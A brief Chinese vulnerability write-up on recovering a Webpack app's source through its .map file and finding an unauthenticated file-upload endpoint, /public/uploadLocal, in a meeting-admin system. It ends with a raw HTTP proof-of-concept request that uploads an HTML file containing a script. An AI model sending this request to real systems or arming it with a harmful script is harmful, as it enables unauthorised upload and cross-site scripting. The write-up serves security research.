Webpack

系统

插件识别框架

app.xxx.js 这个文件算是一个webpack打包的特征文件。

拼接app.xxjs.map下载文件

反编译

对接口进行审计,找未授权接口。

搜索/public/uploadLocal的代码

两个文件都使用了 /public/uploadLocal 接口

查看代码(前端代码)

这个接口没有做身份验证,对上传的文件类型也没有做验证

POC

POST /meeting_admin_interface/public/uploadLocal HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="folder"


------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="1.html"
Content-Type: image/svg+xml

<script>alert(1)</script>
------WebKitFormBoundary7MA4YWxkTrZu0gW--

上传成功

更多推荐